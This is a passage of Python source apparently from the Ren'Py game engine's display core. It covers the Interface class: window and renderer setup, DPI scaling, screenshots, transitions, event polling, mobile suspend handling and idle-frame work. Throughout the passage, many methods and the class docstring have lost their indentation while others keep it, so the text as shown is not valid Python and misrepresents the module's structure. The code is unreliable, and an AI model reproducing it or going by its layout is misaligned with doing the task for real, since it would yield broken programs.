        renpy.display.draw.set_mouse_pos(new_x, new_y)
        return True
def get_safe_mode():
    """
    Returns true if we should go into safe mode.
    """

    # Only check once per run.
    if renpy.safe_mode_checked:
        return False

    try:
        # Safe mode doesn't work on other platforms.
        if not renpy.windows:
            return False

        import ctypes

        VK_SHIFT = 0x10

        # Safe mode is requested by holding shift down at startup.
        ctypes.windll.user32.GetKeyState.restype = ctypes.c_ushort
        shift_down = ctypes.windll.user32.GetKeyState(VK_SHIFT) & 0x8000
        return bool(shift_down)

    except:
        return False
# How long should we be in maximum framerate mode at the start of the game?
# (Consumed by Interface.__init__, which passes it to maximum_framerate().)
initial_maximum_framerate = 0.0
class Interface(object):
"""
This represents the user interface that interacts with the user.
It manages the Display objects that display things to the user, and
also handles accepting and responding to user input.
@ivar display: The display that we used to display the screen.
@ivar profile_time: The time of the last profiling.
@ivar screenshot: A screenshot, or None if no screenshot has been
taken.
@ivar old_scene: The last thing that was displayed to the screen.
@ivar transition: A map from layer name to the transition that will
be applied the next time interact restarts.
@ivar transition_time: A map from layer name to the time the transition
involving that layer started.
@ivar transition_from: A map from layer name to the scene that we're
transitioning from on that layer.
@ivar suppress_transition: If True, then the next transition will not
happen.
@ivar force_redraw: If True, a redraw is forced.
@ivar restart_interaction: If True, the current interaction will
be restarted.
@ivar pushed_event: If not None, an event that was pushed back
onto the stack.
@ivar mouse: The name of the mouse cursor to use during the current
interaction.
@ivar ticks: The number of 20hz ticks.
@ivar frame_time: The time at which we began drawing this frame.
@ivar interact_time: The time of the start of the first frame of the current interact_core.
@ivar time_event: A singleton ignored event.
@ivar event_time: The time of the current event.
@ivar timeout_time: The time at which the timeout will occur.
"""
    def __init__(self):
        """
        Initializes the interface singleton: interaction/transition state,
        per-layer properties, audio, pygame's display, and timing. Registers
        itself as renpy.game.interface and renpy.display.interface.
        """

        # PNG data and the surface for the current file screenshot.
        self.screenshot = None
        self.screenshot_surface = None

        self.old_scene = { }
        self.transition = { }
        self.ongoing_transition = { }
        self.transition_time = { }
        self.transition_from = { }
        self.suppress_transition = False
        self.quick_quit = False
        self.force_redraw = False
        self.restart_interaction = False
        self.pushed_event = None
        self.ticks = 0
        self.mouse = 'default'
        self.timeout_time = None
        self.last_event = None
        self.current_context = None
        self.roll_forward = None

        # Things to be preloaded.
        self.preloads = [ ]

        # The time at which this draw occurs.
        self.frame_time = 0

        # The time when this interaction occured.
        self.interact_time = None

        # The time we last tried to quit.
        self.quit_time = 0

        # Are we currently processing the quit event?
        self.in_quit_event = False

        self.time_event = pygame.event.Event(TIMEEVENT)
        self.redraw_event = pygame.event.Event(REDRAW)

        # Are we focused?
        self.mouse_focused = True
        self.keyboard_focused = True

        # Properties for each layer.
        self.layer_properties = { }

        # Have we shown the window this interaction?
        self.shown_window = False

        # Are we in fullscren mode?
        self.fullscreen = False

        # Should we ignore the rest of the current touch? Used to ignore the
        # rest of a mousepress after a longpress occurs.
        self.ignore_touch = False

        # Should we clear the screenshot at the start of the next interaction?
        self.clear_screenshot = False

        # Build the fixed per-layer properties, applying clipping where
        # config.layer_clipping specifies a rectangle for the layer.
        for layer in renpy.config.layers + renpy.config.top_layers:
            if layer in renpy.config.layer_clipping:
                x, y, w, h = renpy.config.layer_clipping[layer]
                self.layer_properties[layer] = dict(
                    xpos=x,
                    xanchor=0,
                    ypos=y,
                    yanchor=0,
                    xmaximum=w,
                    ymaximum=h,
                    xminimum=w,
                    yminimum=h,
                    clipping=True,
                    )

            else:
                self.layer_properties[layer] = dict()

        # A stack giving the values of self.transition and self.transition_time
        # for contexts outside the current one. This is used to restore those
        # in the case where nothing has changed in the new context.
        self.transition_info_stack = [ ]

        # The time when the event was dispatched.
        self.event_time = 0

        # The time we saw the last mouse event.
        self.mouse_event_time = None

        # Should we show the mouse?
        self.show_mouse = True

        # Should we reset the display?
        self.display_reset = False

        # The last size we were resized to.
        self.last_resize = None

        # The thread that can do display operations.
        self.thread = threading.current_thread()

        # Initialize audio.
        renpy.audio.audio.init()

        # Initialize pygame.
        try:
            pygame.display.init()
        except:
            pass

        # Init timing.
        init_time()
        self.mouse_event_time = get_time()

        # The current window caption.
        self.window_caption = None

        renpy.game.interface = self
        renpy.display.interface = self

        # Are we in safe mode, from holding down shift at start?
        self.safe_mode = False

        # Do we need a background screenshot?
        self.bgscreenshot_needed = False

        # Event used to signal background screenshot taken.
        self.bgscreenshot_event = threading.Event()

        # The background screenshot surface.
        self.bgscreenshot_surface = None

        # Mouse move. If not None, information about the current mouse
        # move.
        self.mouse_move = None

        # If in text editing mode, the current text editing event.
        self.text_editing = None

        # The text rectangle after the current draw.
        self.text_rect = None

        # The text rectangle after the previous draw.
        self.old_text_rect = None

        # Are we a touchscreen?
        self.touch = renpy.exports.variant("touch")

        # Should we restart the interaction?
        self.restart_interaction = True

        # For compatibility with older code.
        if renpy.config.periodic_callback:
            renpy.config.periodic_callbacks.append(renpy.config.periodic_callback)

        renpy.display.emulator.init_emulator()

        # Has start been called?
        self.started = False

        # Are we in fullscreen video mode?
        self.fullscreen_video = False

        self.safe_mode = get_safe_mode()
        renpy.safe_mode_checked = True

        # A scale factor used to compensate for the system DPI.
        self.dpi_scale = self.setup_dpi_scaling()

        renpy.display.log.write("DPI scale factor: %f", self.dpi_scale)

        # A time until which we should draw at maximum framerate.
        self.maximum_framerate_time = 0.0
        self.maximum_framerate(initial_maximum_framerate)

        # True if this is the first interact.
        self.start_interact = True

        # The time of each frame.
        self.frame_times = [ ]

        # The duration of each frame, in seconds.
        self.frame_duration = 1.0 / 60.0
    def setup_dpi_scaling(self):
        """
        Determines the DPI scale factor: the RENPY_HIGHDPI environment
        variable if set, the Windows device caps on Windows, and 1.0
        everywhere else (or on any failure).
        """

        if "RENPY_HIGHDPI" in os.environ:
            return float(os.environ["RENPY_HIGHDPI"])

        if not renpy.windows:
            return 1.0

        try:
            import ctypes
            from ctypes import c_void_p, c_int

            ctypes.windll.user32.SetProcessDPIAware()

            GetDC = ctypes.windll.user32.GetDC
            GetDC.restype = c_void_p
            GetDC.argtypes = [ c_void_p ]

            ReleaseDC = ctypes.windll.user32.ReleaseDC
            ReleaseDC.argtypes = [ c_void_p, c_void_p ]

            GetDeviceCaps = ctypes.windll.gdi32.GetDeviceCaps
            GetDeviceCaps.restype = c_int
            GetDeviceCaps.argtypes = [ c_void_p, c_int ]

            LOGPIXELSX = 88

            # Scale relative to the 96-DPI Windows baseline.
            dc = GetDC(None)
            rv = GetDeviceCaps(dc, LOGPIXELSX) / 96.0
            ReleaseDC(None, dc)

            if rv < renpy.config.de_minimus_dpi_scale:
                renpy.display.log.write("De minimus DPI scale, was %r", rv)
                rv = 1.0

            return rv

        except:
            renpy.display.log.write("Could not determine DPI scale factor:")
            renpy.display.log.exception()
            return 1.0
    def start(self):
        """
        Starts the interface, by opening a window and setting the mode.
        Safe to call more than once; only the first call has an effect.
        """

        if self.started:
            return

        # Collect garbage now, so a later automatic collection is cheaper.
        gc.collect()

        if gc.garbage:
            gc.garbage[:] = [ ]

        renpy.display.render.render_ready()

        # Kill off the presplash.
        renpy.display.presplash.end()

        renpy.main.log_clock("Interface start")

        self.started = True

        self.set_mode()

        # Load the image fonts.
        renpy.text.font.load_fonts()

        # Setup periodic event.
        pygame.time.set_timer(PERIODIC, PERIODIC_INTERVAL)

        # Don't grab the screen.
        pygame.event.set_grab(False)

        if not self.safe_mode:
            renpy.display.controller.init()

        s = "Total time until interface ready: {}s".format(time.time() - import_time)

        renpy.display.log.write(s)

        if renpy.android and not renpy.config.log_to_stdout:
            print(s)
    def post_init(self):
        """
        This is called after display init, but before the window is created.

        Sets SDL hints, the window class/caption/icon, keyboard repeat, the
        android wakelock, and blocks pygame events Ren'Py doesn't use.
        """

        pygame.display.hint("SDL_VIDEO_MINIMIZE_ON_FOCUS_LOSS", "0")

        # Needed for Unity.
        wmclass = renpy.config.save_directory or os.path.basename(sys.argv[0])
        os.environ[b'SDL_VIDEO_X11_WMCLASS'] = wmclass.encode("utf-8")

        self.set_window_caption(force=True)
        self.set_icon()

        if renpy.config.key_repeat is not None:
            delay, repeat_delay = renpy.config.key_repeat
            pygame.key.set_repeat(int(1000 * delay), int(1000 * repeat_delay))

        if android:
            android.wakelock(True)

        # Block events we don't use.
        for i in pygame.event.get_standard_events():

            if i in enabled_events:
                continue

            if i in renpy.config.pygame_events:
                continue

            pygame.event.set_blocked(i)
    def set_icon(self):
        """
        This is called to set up the window icon.
        """

        # Window icon.
        icon = renpy.config.window_icon

        if icon:

            im = renpy.display.scale.image_load_unscaled(
                renpy.loader.load(icon),
                icon,
                )

            # Convert the aspect ratio to be square, by centering the icon
            # on a square surface whose side is the larger dimension.
            iw, ih = im.get_size()
            imax = max(iw, ih)
            square_im = renpy.display.pgrender.surface_unscaled((imax, imax), True)
            square_im.blit(im, ( (imax-iw)/2, (imax-ih)/2 ))
            im = square_im

            pygame.display.set_icon(im)
def set_window_caption(self, force=False):
window_title = renpy.config.window_title
if window_title is None:
window_title = "A Ren'Py Game"
caption = renpy.translation.translate_string(window_title) + renpy.store._window_subtitle
if renpy.exports.get_autoreload():
caption += " - autoreload"
if not force and caption == self.window_caption:
return
self.window_caption = caption
pygame.display.set_caption(caption.encode("utf-8"))
    def iconify(self):
        # Minimizes (iconifies) the game window.
        pygame.display.iconify()
    def get_draw_constructors(self):
        """
        Figures out the list of draw constructors to try.

        The renderer preference comes from the saved preference, overridden
        by RENPY_RENDERER, and forced to "sw" in safe mode. "sw" always ends
        the list as the final fallback.
        """

        renderer = renpy.game.preferences.renderer
        renderer = os.environ.get("RENPY_RENDERER", renderer)

        if self.safe_mode:
            renderer = "sw"

        # ANGLE only exists on Windows.
        if (renderer == "angle") and (not renpy.windows):
            renderer = "auto"

        renpy.config.renderer = renderer

        if renderer == "auto":
            if renpy.windows:
                renderers = [ "gl", "angle", "sw" ]
            else:
                renderers = [ "gl", "sw" ]

            if renpy.config.gl2:
                renderers = [ "gl2", "egl2" ] + renderers

        else:
            renderers = [ renderer, "sw" ]

        draw_objects = { }

        def make_draw(name, mod, cls, *args):
            # Instantiates draw class `cls` from module `mod` under `name`,
            # if `name` was requested. Returns True on success; import or
            # construction failures are logged and reported as False.

            if name not in renderers:
                return False

            try:
                __import__(mod)
                module = sys.modules[mod]
                draw_class = getattr(module, cls)
                draw_objects[name] = draw_class(*args)
                return True

            except:
                renpy.display.log.write("Couldn't import {0} renderer:".format(name))
                renpy.display.log.exception()
                return False

        if renpy.windows:
            has_angle = make_draw("angle", "renpy.angle.gldraw", "GLDraw")
        else:
            has_angle = False

        make_draw("gl", "renpy.gl.gldraw", "GLDraw", not has_angle)
        make_draw("gl2", "renpy.gl2.gl2draw", "GL2Draw", "gl2", False)
        make_draw("gles2", "renpy.gl2.gl2draw", "GL2Draw", "gles2", True)
        make_draw("sw", "renpy.display.swdraw", "SWDraw")

        rv = [ ]

        def append_draw(name):
            # Appends the instantiated draw object for `name`, if any.
            if name in draw_objects:
                rv.append(draw_objects[name])
            else:
                renpy.display.log.write("Unknown renderer: {0}".format(name))

        for i in renderers:
            append_draw(i)

        return rv
    def kill_textures(self):
        # Frees draw-object textures, render memory, and text layout caches.

        if renpy.display.draw is not None:
            renpy.display.draw.kill_textures()

        renpy.display.render.free_memory()
        renpy.text.text.layout_cache_clear()
    def kill_textures_and_surfaces(self):
        """
        Kill all textures and surfaces that are loaded.
        """

        self.kill_textures()

        # Also drop the image cache and the module's buffer-object cache.
        renpy.display.im.cache.clear()
        renpy.display.module.bo_cache = None
    def set_mode(self, physical_size=None):
        """
        This sets the video mode. It also picks the draw object.

        Raises an Exception if no draw object can set a mode; in that case
        the fullscreen preference is cleared so the next run can recover.
        """

        # Ensure that we kill off the movie when changing screen res.
        if renpy.display.draw and renpy.display.draw.info["renderer"] == "sw":
            renpy.display.video.movie_stop(clear=False)

        renpy.display.render.free_memory()
        renpy.text.text.layout_cache_clear()
        renpy.display.module.bo_cache = None

        if self.display_reset:

            pygame.key.stop_text_input()  # @UndefinedVariable
            pygame.key.set_text_input_rect(None)  # @UndefinedVariable
            self.text_rect = None

            if renpy.display.draw.info["renderer"] == "angle":
                renpy.display.draw.quit()

                # This is necessary to fix a bug with restoring a window from
                # minimized state on windows.
                pygame.display.quit()

            self.kill_textures_and_surfaces()

        self.old_text_rect = None
        self.display_reset = False

        virtual_size = (renpy.config.screen_width, renpy.config.screen_height)

        if physical_size is None:
            if renpy.mobile or renpy.game.preferences.physical_size is None:  # @UndefinedVariable
                physical_size = (None, None)
            else:
                physical_size = renpy.game.preferences.physical_size

        # Setup screen.
        fullscreen = renpy.game.preferences.fullscreen

        old_fullscreen = self.fullscreen
        self.fullscreen = fullscreen

        if os.environ.get('RENPY_DISABLE_FULLSCREEN', False):
            fullscreen = False
            self.fullscreen = renpy.game.preferences.fullscreen

        # Reuse the existing draw object when we have one; otherwise try
        # each candidate renderer in preference order.
        if renpy.display.draw:
            draws = [ renpy.display.draw ]
        else:
            draws = self.get_draw_constructors()

        for draw in draws:
            if draw.set_mode(virtual_size, physical_size, fullscreen):
                renpy.display.draw = draw
                renpy.display.render.models = draw.info.get("models", False)
                break
            else:
                # pygame.display.quit()
                pass
        else:
            # No renderer could set a mode.
            # Ensure we don't get stuck in fullscreen.
            renpy.game.preferences.fullscreen = False
            raise Exception("Could not set video mode.")

        # Save the video size.
        if renpy.config.save_physical_size and not fullscreen and not old_fullscreen:
            renpy.game.preferences.physical_size = renpy.display.draw.get_physical_size()

        if android:
            android.init()

        # We need to redraw the (now blank) screen.
        self.force_redraw = True

        # Assume we have focus until told otherwise.
        self.mouse_focused = True
        self.keyboard_focused = True

        # Assume we're not minimized.
        self.minimized = False

        # Force an interaction restart.
        self.restart_interaction = True

        # True if we're doing a one-time profile.
        self.profile_once = False

        # Clear the frame times.
        self.frame_times = [ ]
    def draw_screen(self, root_widget, fullscreen_video, draw):
        """
        Renders the screen from `root_widget`, draws it when `draw` is true,
        and maintains the rolling frame-time list and focus information.
        """

        # Run per-frame screen updates with the per_frame flag set.
        try:
            renpy.display.render.per_frame = True
            renpy.display.screen.per_frame()
        finally:
            renpy.display.render.per_frame = False

        surftree = renpy.display.render.render_screen(
            root_widget,
            renpy.config.screen_width,
            renpy.config.screen_height,
            )

        if draw:
            renpy.display.draw.draw_screen(surftree, fullscreen_video)

        now = time.time()

        self.frame_times.append(now)

        # Trim frame times that fall outside the performance window.
        while (now - self.frame_times[0]) > renpy.config.performance_window:
            self.frame_times.pop(0)

        renpy.display.render.mark_sweep()
        renpy.display.focus.take_focuses()

        self.surftree = surftree
        self.fullscreen_video = fullscreen_video
    def take_screenshot(self, scale, background=False):
        """
        This takes a screenshot of the current screen, and stores it so
        that it can gotten using get_screenshot()

        `scale`
            The (width, height) the screenshot is scaled to.

        `background`
            If true, we're in a background thread. So queue the request
            until it can be handled by the main thread.
        """

        self.clear_screenshot = False

        # Do nothing before the first interaction.
        if not self.started:
            return

        if background and not renpy.emscripten:
            # Ask the main thread (via check_background_screenshot) to take
            # the screenshot, and wait for it.
            self.bgscreenshot_event.clear()
            self.bgscreenshot_needed = True

            if not self.bgscreenshot_event.wait(1.0):
                raise Exception("Screenshot timed out.")

            surf = self.bgscreenshot_surface
            self.bgscreenshot_surface = None

        else:

            surf = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)

        surf = renpy.display.scale.smoothscale(surf, scale)

        renpy.display.render.mutated_surface(surf)

        self.screenshot_surface = surf

        # Also keep the PNG-encoded bytes, for use in save files.
        sio = cStringIO.StringIO()
        renpy.display.module.save_png(surf, sio, 0)
        self.screenshot = sio.getvalue()
        sio.close()
def check_background_screenshot(self):
"""
Handles requests for a background screenshot.
"""
if self.bgscreenshot_needed:
self.bgscreenshot_needed = False
self.bgscreenshot_surface = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
self.bgscreenshot_event.set()
    def get_screenshot(self):
        """
        Gets the current screenshot, as a string. Returns None if there isn't
        a current screenshot.
        """

        if not self.started:
            self.start()

        rv = self.screenshot

        if not rv:
            # No cached screenshot - take a thumbnail-sized one now. Use the
            # background path when called off the display thread.
            self.take_screenshot(
                (renpy.config.thumbnail_width, renpy.config.thumbnail_height),
                background=(threading.current_thread() is not self.thread),
                )
            rv = self.screenshot
            self.lose_screenshot()

        return rv
def lose_screenshot(self):
"""
This deallocates the saved screenshot.
"""
self.screenshot = None
self.screenshot_surface = None
    def save_screenshot(self, filename):
        """
        Saves a full-size screenshot in the given filename.

        Returns True on success and False on failure (unless config.debug
        re-raises the error).
        """

        window = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)

        if renpy.config.screenshot_crop:
            window = window.subsurface(renpy.config.screenshot_crop)

        try:
            renpy.display.scale.image_save_unscaled(window, filename)

            if renpy.emscripten:
                # In the browser, trigger a download of the just-written file.
                import emscripten
                emscripten.run_script(r'''FSDownload('%s')''' % filename)

            return True
        except:
            if renpy.config.debug:
                raise

            return False
    def show_window(self):
        """
        Shows the empty dialogue window when the store, preferences, and
        current interaction call for it, by running config.empty_window with
        history recording suppressed.
        """

        if not renpy.store._window:
            return

        if not renpy.game.preferences.show_empty_window:
            return

        if renpy.game.context().scene_lists.shown_window:
            return

        if renpy.config.empty_window:

            # Suppress history recording while showing the empty window.
            old_history = renpy.store._history  # @UndefinedVariable
            renpy.store._history = False

            PPP("empty window")

            try:
                renpy.config.empty_window()
            finally:
                renpy.store._history = old_history
    def do_with(self, trans, paired, clear=False):
        """
        Runs the transition `trans` as its own interaction. Returns the
        result of interact(), or False when the transition is absent or
        suppressed (in which case a `with None` is performed instead).
        """

        if renpy.config.with_callback:
            trans = renpy.config.with_callback(trans, paired)

        if (not trans) or self.suppress_transition:
            self.with_none()
            return False
        else:
            self.set_transition(trans)
            return self.interact(trans_pause=True,
                                 suppress_overlay=not renpy.config.overlay_during_with,
                                 mouse='with',
                                 clear=clear)
    def with_none(self, overlay=True):
        """
        Implements the with None command, which sets the scene we will
        be transitioning from.
        """

        PPP("start of with none")

        renpy.game.context().say_attributes = None

        # Show the window, if that's necessary.
        self.show_window()

        # Compute the overlay.
        if overlay:
            self.compute_overlay()

        scene_lists = renpy.game.context().scene_lists

        # Compute the scene, and record it as the baseline for the next
        # transition - except on layers that already have one pending.
        for layer, d in self.compute_scene(scene_lists).iteritems():
            if layer not in self.transition:
                self.old_scene[layer] = d

        # Get rid of transient things.
        for i in renpy.config.overlay_layers:
            scene_lists.clear(i)

        scene_lists.replace_transient()
        scene_lists.shown_window = False

        if renpy.store._side_image_attributes_reset:
            renpy.store._side_image_attributes = None
            renpy.store._side_image_attributes_reset = False
def set_transition(self, transition, layer=None, force=False):
"""
Sets the transition that will be performed as part of the next
interaction.
"""
if self.suppress_transition and not force:
return
if transition is None:
self.transition.pop(layer, None)
else:
self.transition[layer] = transition
def event_peek(self):
"""
This peeks the next event. It returns None if no event exists.
"""
if self.pushed_event:
return self.pushed_event
ev = pygame.event.poll()
if ev.type == pygame.NOEVENT:
self.check_background_screenshot()
# Seems to prevent the CPU from speeding up.
renpy.display.draw.event_peek_sleep()
return None
self.pushed_event = ev
return ev
def event_poll(self):
"""
Called to busy-wait for an event while we're waiting to
redraw a frame.
"""
if self.pushed_event:
rv = self.pushed_event
self.pushed_event = None
else:
rv = pygame.event.poll()
self.last_event = rv
return rv
def event_wait(self):
"""
This is in its own function so that we can track in the
profiler how much time is spent in interact.
"""
if self.pushed_event:
rv = self.pushed_event
self.pushed_event = None
self.last_event = rv
return rv
self.check_background_screenshot()
ev = pygame.event.wait()
self.last_event = ev
return ev
    def compute_overlay(self):
        """
        Rebuilds the overlay layer by running the configured overlay
        functions (plus the window overlay functions, when the window is
        shown). Does nothing while suppress_overlay is set.
        """

        if renpy.store.suppress_overlay:
            return

        # Figure out what the overlay layer should look like.
        renpy.ui.layer("overlay")

        for i in renpy.config.overlay_functions:
            i()

        if renpy.game.context().scene_lists.shown_window:
            for i in renpy.config.window_overlay_functions:
                i()

        renpy.ui.close()
def compute_scene(self, scene_lists):
"""
This converts scene lists into a dictionary mapping layer
name to a Fixed containing that layer.
"""
rv = { }
for layer in renpy.config.layers + renpy.config.top_layers:
rv[layer] = scene_lists.make_layer(layer, self.layer_properties[layer])
root = renpy.display.layout.MultiBox(layout='fixed')
root.layers = { }
for layer in renpy.config.layers:
root.layers[layer] = rv[layer]
root.add(rv[layer])
rv[None] = root
return rv
    def quit_event(self):
        """
        This is called to handle the user invoking a quit.
        """

        if self.screenshot is None:
            renpy.exports.take_screenshot()

        # A second quit within .75s forces an immediate quit.
        if self.quit_time > (time.time() - .75):
            renpy.exports.quit(save=True)

        # A quit while already running the quit action also quits directly.
        if self.in_quit_event:
            renpy.exports.quit(save=True)

        if renpy.config.quit_action is not None:
            self.quit_time = time.time()

            # Make the screen more suitable for interactions.
            renpy.exports.movie_stop(only_fullscreen=True)
            renpy.store.mouse_visible = True

            try:
                self.in_quit_event = True
                renpy.display.behavior.run(renpy.config.quit_action)
            finally:
                self.in_quit_event = False

        else:
            renpy.exports.quit(save=True)
    def get_mouse_info(self):
        """
        Returns a (hardware, x-offset, y-offset, texture) tuple describing
        the mouse cursor: hardware is True when the OS cursor should be
        shown, and texture is None when no cursor should be drawn at all.
        """

        # Figure out if the mouse visibility algorithm is hiding the mouse.
        if (renpy.config.mouse_hide_time is not None) and (self.mouse_event_time + renpy.config.mouse_hide_time < renpy.display.core.get_time()):
            visible = False
        else:
            visible = renpy.store.mouse_visible and (not renpy.game.less_mouse)

        visible = visible and self.show_mouse and not (renpy.display.video.fullscreen)

        # If not visible, hide the mouse.
        if not visible:
            return False, 0, 0, None

        # Deal with a hardware mouse, the easy way.
        if not renpy.config.mouse:
            return True, 0, 0, None

        # Deal with the mouse going offscreen.
        if not self.mouse_focused:
            return False, 0, 0, None

        mouse_kind = renpy.display.focus.get_mouse() or self.mouse

        # Figure out the mouse animation.
        if mouse_kind in renpy.config.mouse:
            anim = renpy.config.mouse[mouse_kind]
        else:
            anim = renpy.config.mouse[getattr(renpy.store, 'default_mouse', 'default')]

        # Select the animation frame from the 20hz tick counter.
        img, x, y = anim[self.ticks % len(anim)]

        rend = renpy.display.im.load_image(img)

        tex = rend.children[0][0]
        xo = rend.children[0][1]
        yo = rend.children[0][2]

        return False, x - xo, y - yo, tex
def set_mouse_pos(self, x, y, duration):
"""
Sets the mouse position. Duration can be a number of seconds or
None.
"""
self.mouse_move = MouseMove(x, y, duration)
self.force_redraw = True
def drawn_since(self, seconds_ago):
"""
Returns true if the screen has been drawn in the last `seconds_ago`,
and false otherwise.
"""
return (get_time() - self.frame_time) <= seconds_ago
    def check_suspend(self, ev):
        """
        Handles the SDL2 mobile suspend protocol. Returns true when `ev`
        started a background/foreground cycle (the caller should skip the
        event), false otherwise. May not return at all: APP_TERMINATING
        exits the process, and APP_WILLENTERBACKGROUND blocks in an event
        loop until the app is foregrounded again.
        """

        def save():
            # Auto-save so the session can be restored after backgrounding.
            if renpy.config.save_on_mobile_background and (not renpy.store.main_menu):
                renpy.loadsave.save("_reload-1")

            renpy.persistent.update(True)

        if ev.type == pygame.APP_TERMINATING:
            save()
            sys.exit(0)

        if ev.type != pygame.APP_WILLENTERBACKGROUND:
            return False

        # At this point, we're about to enter the background.

        renpy.audio.audio.pause_all()

        if android:
            android.wakelock(False)

        # Stop all interface timers while backgrounded.
        pygame.time.set_timer(PERIODIC, 0)
        pygame.time.set_timer(REDRAW, 0)
        pygame.time.set_timer(TIMEEVENT, 0)

        save()

        if renpy.config.quit_on_mobile_background:
            sys.exit(0)

        renpy.exports.free_memory()

        print("Entered background.")

        # Block until the OS tells us we're visible again (or terminating).
        while True:
            ev = pygame.event.wait()

            if ev.type == pygame.APP_DIDENTERFOREGROUND:
                break

            if ev.type == pygame.APP_TERMINATING:
                sys.exit(0)

        print("Entering foreground.")

        # Since we came back to life, we can get rid of the
        # auto-reload.
        renpy.loadsave.unlink_save("_reload-1")

        pygame.time.set_timer(PERIODIC, PERIODIC_INTERVAL)

        renpy.audio.audio.unpause_all()

        if android:
            android.wakelock(True)

        # Reset the display so we get the GL context back.
        self.display_reset = True
        self.restart_interaction = True

        return True
def iconified(self):
"""
Called when we become an icon.
"""
if self.minimized:
return
self.minimized = True
renpy.display.log.write("The window was minimized.")
def restored(self):
"""
Called when we are restored from being an icon.
"""
# This is necessary on Windows/DirectX/Angle, as otherwise we get
# a blank screen.
if not self.minimized:
return
self.minimized = False
renpy.display.log.write("The window was restored.")
if renpy.windows:
self.display_reset = True
self.set_mode(self.last_resize)
def enter_context(self):
"""
Called when we enter a new context.
"""
# Stop ongoing transitions.
self.ongoing_transition.clear()
self.transition_from.clear()
self.transition_time.clear()
    def post_time_event(self):
        """
        Posts a single time_event (TIMEEVENT) object to the pygame event
        queue. Failures (presumably a full or uninitialized event queue)
        are deliberately ignored.
        """
        try:
            pygame.event.post(self.time_event)
        except:
            pass
    def after_longpress(self):
        """
        Called after a longpress on a touch screen: ignores the coming
        mouse-button release and moves the focus pointer offscreen
        ((-1, -1)) so nothing stays hovered.
        """
        self.ignore_touch = True
        renpy.display.focus.mouse_handler(None, -1, -1, default=False)
def text_event_in_queue(self):
"""
Returns true if the next event in the queue is a text editing event.
"""
ev = self.event_peek()
if ev is None:
return False
else:
return ev.type in (pygame.TEXTINPUT, pygame.TEXTEDITING)
    def update_text_rect(self):
        """
        Pushes the current text-input rectangle to the OS IME: starts or
        stops SDL text input as self.text_rect appears or disappears, and
        re-sends the rectangle (untranslated to window coordinates) when
        it changes.
        """
        # The store variable overrides the rect computed during drawing.
        if renpy.store._text_rect is not None: # @UndefinedVariable
            self.text_rect = renpy.store._text_rect # @UndefinedVariable

        if self.text_rect is not None:

            # True when a screen keyboard exists but is not currently up,
            # in which case text input is (re)started below.
            not_shown = pygame.key.has_screen_keyboard_support() and not pygame.key.is_screen_keyboard_shown() # @UndefinedVariable

            if self.old_text_rect != self.text_rect:
                x, y, w, h = self.text_rect
                x0, y0 = renpy.display.draw.untranslate_point(x, y)
                x1, y1 = renpy.display.draw.untranslate_point(x + w, y + h)
                rect = (x0, y0, x1 - x0, y1 - y0)

                pygame.key.set_text_input_rect(rect) # @UndefinedVariable

            if not self.old_text_rect or not_shown:
                pygame.key.start_text_input() # @UndefinedVariable

        else:

            # Text input has ended - tear it down.
            if self.old_text_rect:
                pygame.key.stop_text_input() # @UndefinedVariable
                pygame.key.set_text_input_rect(None) # @UndefinedVariable

        self.old_text_rect = self.text_rect
def maximum_framerate(self, t):
"""
Forces Ren'Py to draw the screen at the maximum framerate for `t` seconds.
"""
if t is None:
self.maximum_framerate_time = 0
else:
self.maximum_framerate_time = max(self.maximum_framerate_time, get_time() + t)
    def interact(self, clear=True, suppress_window=False, trans_pause=False, **kwargs):
        """
        This handles an interaction, restarting it if necessary. All of the
        keyword arguments are passed off to interact_core.

        `clear` - when true, transient scene elements are cleared once the
        interaction ends. `suppress_window` - skips showing the missing
        window. Raises if an interaction is already running in the current
        context.
        """

        renpy.plog(1, "start of new interaction")

        if not self.started:
            self.start()

        if self.clear_screenshot:
            self.lose_screenshot()

        self.clear_screenshot = False

        self.trans_pause = trans_pause

        # Cancel magic error reporting.
        renpy.bootstrap.report_error = None

        context = renpy.game.context()

        if context.interacting:
            raise Exception("Cannot start an interaction in the middle of an interaction, without creating a new context.")

        context.interacting = True

        # Show a missing window.
        if not suppress_window:
            self.show_window()

        # These things can be done once per interaction.
        preloads = self.preloads
        self.preloads = [ ]

        try:
            for i in renpy.config.start_interact_callbacks:
                i()

            # interact_core may ask to be re-run (restart_interaction);
            # loop until it produces a final result.
            repeat = True

            self.start_interact = True

            while repeat:
                repeat, rv = self.interact_core(preloads=preloads, trans_pause=trans_pause, **kwargs)
                self.start_interact = False

            return rv

        finally:

            context.interacting = False

            # Clean out transient stuff at the end of an interaction.
            if clear:
                scene_lists = renpy.game.context().scene_lists
                scene_lists.replace_transient()

            self.ongoing_transition = { }
            self.transition_time = { }
            self.transition_from = { }

            self.restart_interaction = True

            renpy.game.context().mark_seen()
            renpy.game.context().scene_lists.shown_window = False

            if renpy.game.log is not None:
                renpy.game.log.did_interaction = True

            if renpy.store._side_image_attributes_reset:
                renpy.store._side_image_attributes = None
                renpy.store._side_image_attributes_reset = False
def consider_gc(self):
"""
Considers if we should peform a garbage collection.
"""
if not renpy.config.manage_gc:
return
count = gc.get_count()
if count[0] >= renpy.config.idle_gc_count:
renpy.plog(2, "before gc")
if count[2] >= renpy.config.gc_thresholds[2]:
gen = 2
elif count[1] >= renpy.config.gc_thresholds[1]:
gen = 1
else:
gen = 0
gc.collect(gen)
if gc.garbage:
renpy.memory.print_garbage(gen)
gc.garbage[:] = [ ]
renpy.plog(2, "after gc")
    def idle_frame(self, can_block, expensive):
        """
        Tasks that are run during "idle" frames, budgeted to roughly 0.5ms
        unless `can_block` and `expensive` are both set: garbage
        collection, texture uploads, image prediction, (emscripten)
        preloads, and the once-per-interaction autosave. Stops early when
        an event arrives.
        """

        if expensive:
            renpy.plog(1, "start idle_frame (expensive)")
        else:
            renpy.plog(1, "start idle_frame (inexpensive)")

        # We want this to include the GC time, so we don't predict on
        # frames where we GC.
        start = get_time()

        step = 1

        while True:

            # An event is pending - stop idling at once.
            if self.event_peek():
                break

            if not (can_block and expensive):
                if get_time() > (start + .0005):
                    break

            # Step 1: Run gc.
            if step == 1:
                self.consider_gc()
                step += 1

            # Step 2: Push textures to GPU.
            elif step == 2:
                renpy.display.draw.ready_one_texture()
                step += 1

            # Step 3: Predict more images.
            elif step == 3:

                if not self.prediction_coroutine:
                    step += 1
                    continue

                try:
                    result = self.prediction_coroutine.send(expensive)
                except ValueError:
                    # Saw this happen once during a quit, giving a
                    # ValueError: generator already executing
